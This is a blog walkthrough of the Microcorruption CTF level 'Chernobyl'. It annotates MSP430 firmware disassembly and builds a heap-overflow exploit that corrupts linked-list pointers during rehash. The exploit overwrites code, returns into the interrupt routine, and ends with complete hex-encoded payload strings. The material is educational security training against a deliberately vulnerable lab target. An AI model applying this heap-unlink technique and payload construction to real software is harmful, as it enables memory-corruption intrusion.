Microcorruption (Embedded Security CTF): Chernobyl

The second-to-last level in Microcorruption!  This one took me a bit but I finally got it.  I learned a lot about malloc and heap exploitation in the process.  I also learned some random facts about Chernobyl, the city / power plant / disaster, too.

This blog post covers the how and why of the solution to the Chernobyl level, as well as my thought process of how I found the solution.

Chernobyl Firmware Updates

First of all, there are some major functionality changes to this version of the lock.

This time around, we have PINs that map to different users.

LockIT Pro Account Manager solves the problem of sharing passwords
when  multiple users  must  have  access to  a  lock. The  Account
Manager contains  a mapping of users  to PINs, each of  which is 4
digits.  The  system supports  hundreds of users,  each configured
with his or her own PIN,  without degrading the performance of the
manager.

There are no accounts set up  on the LockIT Pro Account Manager by
default. An administrator must first initialize the lock with user
accounts  and  their  PINs.  User  accounts  are  by  default  not
authorized  for access,  but can  be authorized  by attaching  the
Account  Manager  Authorizer.  This  prevents  users  from  adding
themselves to the lock during its use.

Should be interesting!

A Quick Tour of the Firmware

There’s a lot of code happening here, at least in comparison with previous levels.  I ended up copying the code over to a text editor, and splitting each function into its own file.  This made it significantly easier to reason with different functions, and also store notes in each section.

So what happens here?  Main calls a “run” function:

You might notice that there’s also a “walk” function.  There’s a number of other functions, too, including rehash, add_to_table, get_from_table, and printf, among others.  Maybe we can use the printf for something?

In run, we call create_hash_table and then query the user, telling them

You can open the door by entering 'access [your name] [pin]'.

I tried guessing a few usernames and PINs and got nowhere.  After stepping through the code a bit, and re-reading the release notes, I realized that’s because the lock does not have any usernames configured when we get it.

Before I realized that, however, I wrote my own helper function to see how a byte gets hashed by the hash function.

#include <stdio.h>
#include <stdint.h>

int main() {
  uint16_t original_val = 0b00000000;

  while (original_val <= 0b11111111) {
    uint16_t val = original_val;
    uint16_t sign = 0b10000000 & val;

    if (sign == 0b10000000) {
      val = val + 0b11110000;
    }

    int i;
    for (i = 0; i < 5; i++)
    {
        val = val * 2;
    }
    val = val - original_val; printf("Original val %x --> final val of %x\n", original_val, val);
    original_val = original_val + 0b00000001;
  }
}

This turned out to be mostly useless in terms of finding the solution to Chernobyl, but it was a fun exercise.  I didn’t finish writing it (I’d extend it to include hashing of strings of chars, not just individual chars).

So if there are no preset usernames in the lock controller, does that mean that we’re stuck in this boring loop forever?  What about all the other functions?  At this point, we’re not calling printf or any other custom function outside of run.  What about add_to_table?  Sure that gets used for something…

Strings

On top of all of that, we see that there are a number of strings that sound like interesting conditions.  For example:

“New” functionality

As it turns out, the lock has a feature that allows it to add new users.  How did I find this?  I’ll tell you, but first, let’s talk about how the code parses an “access” command.

After you’ve entered a password, you will get to this point in the run function:

4bbe:  7f90 6100      cmp.b	#0x61, r15
4bc2:  3a20           jne	#0x4c38 <run+0xd2>
4bc4:  0e4b           mov	r11, r14
4bc6:  3e50 0700      add	#0x7, r14
4bca:  0b4e           mov	r14, r11
4bcc:  073c           jmp	#0x4bdc <run+0x76>

The first line is checking r15 (which holds a char from the user’s input) and comparing it to 0x61, which corresponds to “a”.  If it matches, then it adds 0x7 to r14 (which is also pointing to that char).  The string “access " is 7 chars long, including the space.  If we jump 7 spaces, we’ll be at the value of the username.

You’ll also see lines comparing r15 to 0x20 (a space) and 0x3b (a semi-colon… this will be useful later).

Then, finally, you’ll see a line comparing r15 to 0x6e, which is “n”.  Then, you increment by 0x4.

4c38:  7f90 6e00      cmp.b	#0x6e, 15
4c3c:  4020           jne	#0x4cbe <run+0x158>
4c3e:  094b           mov	r11, r9
4c40:  2952           add	#0x4, r9

What could possibly match that?  It doesn’t really matter what the middle chars are, but let’s say for the sake of this blog post that the string is “new “.

That means our format for creating new users is something like

new [username] [pin]

So can we just make a new user account and then log in with that?

new bob 1234

and then

access bob 1234

Will result in this message:

Access granted; but account not activated.

So that didn’t entirely work.  What else can we try?

Other options

This section isn’t written in chronological order of when I came up with and tested various ideas.  Instead, this is my attempt at organizing them into something sane and readable.

Buffer overflow?

We see that there’s a big ‘ole gets call in run:

4bb0:  3e40 5005      mov	#0x550, r14
4bb4:  0f41           mov	sp, r15
4bb6:  b012 404d      call	#0x4d40 <getsn>

This is what accepts our user input each time, to make a new user or access a previous user.

But at the end of the function, we jump 0x600 bytes so there’s no way to use this as a buffer overflow by itself.

4cc8:  3150 0006      add 0x600, sp
4ccc:  3741           pop r7
4cce:  3841           pop r8
4cd0:  3941           pop r9
4cd2:  3a41           pop r10
4cd4:  3b41           pop	r11
4cd6:  3041           ret

On top of that, the memory block from 0x3dec to 0x43f6 gets 00'd out after each gets iteration, so if we put shellcode there, we’ve got a limited time before it’s gone.

Printf?

If we make some new users with arbitrary usernames and pins, we see that we’re actually calling the printf function now, which is cool.

Unfortunately, it looks like we’re out of luck for a string format attack, given the string format specifiers used in the program (vs blindly printing up whatever we submit):

Adding user account %s with pin %x.

That’s too bad.

Game the PIN rules?

Earlier I mentioned a string about having the “high bit set” in a PIN.  This is because of how the pin checking works.  Presumably, a PIN with the high bit set means that it’s been “activated” (see the “not activated” warning message earlier).

This code starts with a call to get_from_table, where we’ll do a strcmp on the usernames.  We’ll also grab the PIN from memory and store it in r15… unless the usernames don’t match, in which case, r15 holds a value of -1 (or 0xffff)

4c0c:  b012 cc49      call	#0x49cc

// if we return from get_from_table and the username doesn't match, r15 = 0xffff
4c10:  3f93           cmp	#-0x1, r15
// If we don't have a matching username, we print up "no such box" and then jump to a puts call, then we're checking for a ; to see if there are multiple new/access commands chained together.  
4c12:  0320           jne	#0x4c1a <run+0xb4>
4c14:  3f40 964a      mov	#0x4a96, r15  // "No such box."
4c18:  413c           jmp	#0x4c9c <run+0x136>

// if we do have a valid username, then r15 and r10 hold the original and user-inputed PINs.
// xor them together and we should get 0, if r15 == r10
4c1a:  0aef           xor	r15, r10

// then we AND that result (0 if they match, some other value if not) with 0x7fff so the high bit is cleared.  Store the result back in r10.
4c1c:  3af0 ff7f      and	#0x7fff, r10

// If that is not zero, jump to "access denied"
4c20:  0820           jnz	#0x4c32 <run+0xcc>

// otherwise, compare r10 and r15.  At this point, r10 = 0, so the only way r15 could be less is... ffff?  fffe?
4c22:  0f9a           cmp	r10, r15
4c24:  0334           jge	#0x4c2c <run+0xc6>
4c26:  3f40 a34a      mov	#0x4aa3, r15  // "Access granted."
4c2a:  383c           jmp	#0x4c9c <run+0x136>
4c2c:  3f40 b34a      mov	#0x4ab3, r15  // "Access granted; but account not activated."
4c30:  353c           jmp	#0x4c9c <run+0x136>
4c32:  3f40 de4a      mov	#0x4ade, r15  // "Access denied. Can not have a pin with high bit set."
4c36:  323c           jmp	#0x4c9c <run+0x136>

This tripped me up for quite a while.  Since there’s a case where r10 is compared to r15 and access is granted, unconditionally, I tried to reverse engineer that code to see if I could find a way around it.  r15 clearly can be a negative number as seen on line 0x4c10.  The other thing that kept me at this strategy longer was this hint on Microcorruption’s about page:

Of course, that integer underflow doesn’t necessarily apply to this level.  Ah well.

Note:  I feel like I’m underselling the level of effort that went into the previous sections.  Each of these ideas included many walkthroughs and annotating assembly in my notes, often-line-by-line.  I kept notes and code samples for everything, but cut it down quite a bit because it’s easier to see the forest for the trees after the fact (like that Margaret Atwood quote “When you are in the middle of a story it isn’t a story at all, but only a confusion… It’s only afterwards that it becomes anything like a story at all. When you are telling it, to yourself or to someone else.")

Anyway…

Really long usernames?

Good idea, but no.  Anything past 15 chars gets cutoff.  Nice try though, we’d be able to overwrite part of the heap structure or something like that.  😉

Really big PINs

I had been adding 4-digit pins but then I though, what if I make a GIANT pin?  As it turns out, no.  The number you input is visible to you as a decimal, but is stored as a 2-byte hex value.  So a really big value like 65,535 would be 0xFFFF in code.  Anything bigger than that will be rolled over and we’ll only see the part of the value that didn’t roll over.

This overlapped with my attempts to trick the “high bit” logic for the PIN check.

Other functions

There’s still the mysterious walk function but it doesn’t look like we can reach it.  The only other functions we haven’t considered devious things with are malloc and free… which are called from a function called rehash.

Unlike walk, we actually have a clear path to calling rehash.  How?  From the add_to_table function.

Rehash

Part of my notes said “Limit on how many chars are put into memory… can we somehow run out of space and use something with that?”

When we originally setup the username table, we have a limited amount of space.  My idea to run out of malloc’d space is the right idea, but when we run out of room, we’ll end up calling the rehash function.

How do we definte “running out of room”?   When we call add_to_table, we end up doing this comparison:

485e:  2c9b           cmp	@r11, r12
4860:  0434           jge	#0x486a <add_to_table>
4862:  1e53           inc	r14
4864:  0f4b           mov	r11, r15
4866:  b012 d448      call	#0x48d4 <rehash>

Where @r11 is the value in 0x5006 and r12 is 0xa.  The comparison is greater or equal, so we need to count to at least 0xb entries, starting from 0:

new a 1;new b 2;new c 3;new d 4;new e 5;new f 6;new g 7;new h 8;new i 9;new j 10;new k 11;new l 12;

If you enter in those values, and set a breakpoint at rehash, you’ll be able to step through the function.

What rehash does

Before we get to rehash, we can see that we’ve got this block at 0x5000 in memory, as well as chunks of data from 0x503c to 0x533c.

In other words, we’ve got a block of memory that holds some kind of metadata, and then a linked list of chunks over roughly 0x300 bytes of space.

Rehash does something similar.  It mallocs a block starting at 0x533e, and then mallocs several more chunks.  These chunks are part of a linked list pointed to by the 0x533e metadata.  

After that’s done, and we have chunks spanning all the way to the 0x5980 block of code, we start calling free.

The first time we call free, we’re passing in 0x5042free starts looking through the previous linked list (where our usernames are stored) and starts following the forward and back links between the chunks.  The last two free calls overwrite some values in the 0x5000 block to point to the new 0x533e block instead.

Finally, our existing usernames and passwords get copied over after we return from rehash and go through the rest of add_to_table

Heap Exhaustion

While fussing around with different inputs, I saw this message:

While fussing around wit

Heap exausted; aborting.

It was pretty late at night at this point and it took me a minute to recreate it, but if you provide an input of:

new AAAA 0;new BBBB 0;new CCCC 0;new DDDD 0;new EEEE 0;

You’ll see the memory get filled up as follows:

The blue box contains the backward and forward links for that chunk.  And if you look at the pattern of AAAA, BBBB, etc. it looks like the next input will land right on top of it.

In other words, we can overwrite the backward and forward links and stop all over our linked list structure.  This doesn’t get us anything until we call rehash, at which time we’re going to step through each of our links to free memory.

If you watched the program create chunks during either rehash or create_hash_table, you’ll notice that it writes those forward and backward links as part of a doubly-linked list.  Here’s a few of the program after creating the table, but before any users are added.

This linked list structure is important when we want to free memory blocks.

When we step through free later (in the midst of our rehash call), we’re updating the backwards and forward pointers for our doubly-linked list.  Whatever value we put in, we’ll then go to that location in memory and add a back pointer.  Then, we’ll add a forward pointer to the next chunk in our list.

If we can overwrite these two pointers, then when we go through rehash, we’ll be able to clobber whatever two memory addresses we want.

Side note / detour

When I realized that I could plop in (fake) link addresses wherever I wanted, I was still stuck on the idea of getting a PIN with the high bit set.  My idea was to overwrite something in the middle of a malloc’d chunk in such a way that a high-bit value would be interpreted as a PIN, since I had totally turned the data structure on its head.  Since this is a side note and not the main strategy, clearly it didn’t work out.

It didn’t work out for a number of reasons (and even if it did, I don’t think that that would have unlocked the door… it would just print a success message).

At a certain point in my notes, I wrote “still stepping all over my own toes.”  What if I stepped on other toes?

Clobber some other addresses

Clobber part of the interrupt?  I was able to do this, with the intention of using the next gets call to trigger an 7f interrupt.  However, because I clobbered part of the interrupt, the gets call didn’t actually get user input.  D’oh.

Historical examples?

At this point, I realized that my clobbering ideas were kind of ineffective and kludgy, so I read a bunch of content about heap exhaustion attacks.

This online resource by Dhaval Kapil was great.  In addition to a tour of malloc and free implementation details (most of which are more complex than what Microcorruption / MSP430 uses), he also goes through a series of attacks, which have some very ✨magical ✨ names.

I also went through this Indiana University slide deck by Yan Huang, and several “unlink” tutorials including this and this.  Lastly, I read this wonderful (repost?) of Malloc Maleficarum, which is a play on Malleus Maleficarum, a treatise on witchcraft.

In addition to lots of malloc-based attacks, this site also has everything else you could want:  some Latin phrases, dramatic names, and some incredible graphic design.  17/10.

Sometimes I wonder if I have enough of a flair for drama to be in infosec.

Anyway, while I didn’t implement any of these attacks directly, I recommend you read them.  They were useful in understanding what kinds of attacks are possible when you have control over certain parts of the data structure.

Heap Exhaustion:  Redux

Let’s recap so far:

Strategy

Since we can clobber any address we want, let’s find a place that lets us call an interrupt with a type of our choosing.  As mentioned earlier, I found a few duds, and this blog post is already getting long enough, so let’s cut to the chase.

Previously, I wrote that we can’t do a buffer overflow because we have a gets call a 0x550 byte buffer length, but later we jump 0x600 bytes after the user input is processed.  If we clobber this line, then we can return to an address of our choosing (by appending it to the end of our input string):

4cc8:  3150 0006      add	#0x600, sp   <-- clobber this
4ccc:  3741           pop	r7
4cce:  3841           pop	r8
4cd0:  3941           pop	r9
4cd2:  3a41           pop	r10
4cd4:  3b41           pop	r11
4cd6:  3041           ret    <-- so when we get here, we return to an address of our choosing

Since we need to trigger an interrupt, let’s ret to the start of the interrupt function.

Then, in the interrupt function, we can use the value that is two bytes over from the stack pointer to trigger a 7f type interrupt.

4cec <INT>
4cec:  1e41 0200      mov	0x2(sp), r14
4cf0:  0212           push	sr
4cf2:  0f4e           mov	r14, r15
4cf4:  8f10           swpb	r15
4cf6:  024f           mov	r15, sr
4cf8:  32d0 0080      bis	#0x8000, sr
4cfc:  b012 1000      call	#0x10
4d00:  3241           pop	sr
4d02:  3041           ret

So let’s get started…

Rehash demo

To show how this works, we’ll enter in the following instructions then run it until you get to rehash.

new AA 0;new BB 1;new CC 1;new DD 1;new EE 1;  // filler

6e657720 c64c fc50 c64c       // "username" to overwrite the 0x509c links

new Z ;new Y ;new X ;new W ;new V ;            // more filler

new ZZZ;                     // we'll replace this with our shell code eventually

What’s going on in that second instruction?  6e657720 is the hex values for “new “.  Then we have our address to clobber (this overwrites the backward link), the current forward link, and then our address again.

Having the address at the end doesn’t really get us anything.  If you set a breakpoint at 4708 in malloc and step through the function once r14 = 509c, you’ll see that our address gets clobbered.  I added it to the end of the back/forward link string and found that it helped get my input positioned in the right place.  The hash of the username helps determine where it gets placed… rather than find a “cleaner” version of this input string that still positioned it correctly, I decided to leave it as-is.

How did I get c64c?  I took the address of this line:

4cc8: 3150 0006 add #0x600, sp

And then subtracted two bytes from it.  Then I swapped the bytes for endianness.  I’ll explain the subtraction part in a minute.

Free; or why this approach wor

Again, if you enter in these 4 lines (we’ll condense them in a bit), you should get to the rehash function.

new AA 0;new BB 1;new CC 1;new DD 1;new EE 1;  
6e657720 c64c fc50 c64c 
new Z ;new Y ;new X ;new W ;new V ; 
new ZZZ;

Set a breakpoint at the start of free.  The second time we visit this function will involve our overwritten links, so continue one time.

At this line, we move the value of @r15 into r14r15 is 0x509c so r14 will be 0x4cc6

472e:  2e4f           mov	@r15, r14

This means that r14 is holding the back link value for this chunk, and it happens to be the value we overwrote.

A few lines later, we’re copying the value of r12 into 4 bytes past 0x4cc6.  This is why we couldn’t just use the value of the “jmp #0x600” line in its original form.  If we want to clobber that line, we need to start a few byte addresses earlier.

473e:  8e4c 0400      mov	r12, 0x4(r14)
4742:  9e4f 0200 0200 mov	0x2(r15), 0x2(r14)

We also clobber two bytes over from 0x4cc6.  As a result, we’ve now written a forward and backward pointer in the middle of existing code (as shown in the blue boxes).

We’ve messed up our linked list, but we’re able to return from the rehash function without exhausting the heap (unlike previous examples).

Once you return from rehash, set a breakpoint at 0x4cc6 and you’ll see that the next four bytes are overwritten by our forward/back link writing.

The only thing left to do now is create shellcode that ensures that we ret to the interrupt function from line 0x4cd6, and trigger a 7f interrupt.

Chernobyl Solution

Let’s recap again:

  1. We can create new users using the new keyword.
  2. With a little bit of finagling, we can predict the positions of each username in memory.
  3. We can also overwrite one of the forward/backward pointer link pairs in the linked list.
  4. When we have created enough new users (12), we call the rehash function, which mallocs new memory and frees old memory.
  5. We can take advantage of items 3 and 4 in this list by overwriting the backward pointer to a location in memory we’d like to clobber, say, the part where we move the stack pointer 0x600 bytes before returning.
  6. The last username we enter will contain shellcode that will return us to the interrupt, and then trigger a 7f interrupt.

Because we have a bunch of pops after our clobbered code (from 0x4ccc to 0x4cd4), we’ll have to make sure we have enough filler to position our return address correctly.  Then, we’ll want “7f”.

That means that our final username, which doubles as our shellcode, looks like:

["new "] [username and pin] [semicolon] [return address] [two bytes of filler] [7f]

I chose “AAA” as a username, and a pin of 1.  The return address is the start of the interrupt function, or 0x4cec.  This ends up becoming “4cec”.

[hex equivalent of "new AAA 1;"] [ec4c] [filler of "90 90"] [7f]

The final string is:

6e65772041414120313bec4c90907f

All together now

So, we have 4 groups of inputs:

  1. 5 “filler” users that help us position the “clobber” user
  2. A user that will clobber the backwards/forwards linked list addresses to, in turn, in turn, clobber the add #0x600, sp line.
  3. 5 more “filler” users.
  4. One final user that has shellcode at the end.

The actual inputs for each of those are:

  1. new AA 0;new BB 1;new CC 1;new DD 1;new EE 1;
  2. 6e657720c64cfc50c64c (check “hex-encoded”)
  3. new Z 1;new Y 2;new X 3;new W 4;new V 5;
  4. 6e65772041414120313bec4c90907f (check “hex-encoded”)

Because it’s annoying to enter 4 different strings, and also costs you more cycles, let’s squash the first 3 into a single string.  We’ll need to add a “3b” (semi-colon) at the end of the second string.

If you wanted, you could probably combine the entire thing into one string, but you’d have to position the shellcode near the start of the string.

Solve

The 5 filler users, user that clobbers the backwards/forwards links, and 5 more filler users can be combined into:

6e657720414120303b6e657720424220313b6e657720434320313b6e657720444420313b6e657720454520313b6e657720c64cfc50c64cff3f20363b6e6577205a203b6e65772059203b6e65772058203b6e65772057203b6e65772056203b

Then, the second string remains the same.

6e65772041414120313bec4c90907f

To solve, type solve and enter those two strings.  Make sure you check “hex-encoded” each time.

Ta da!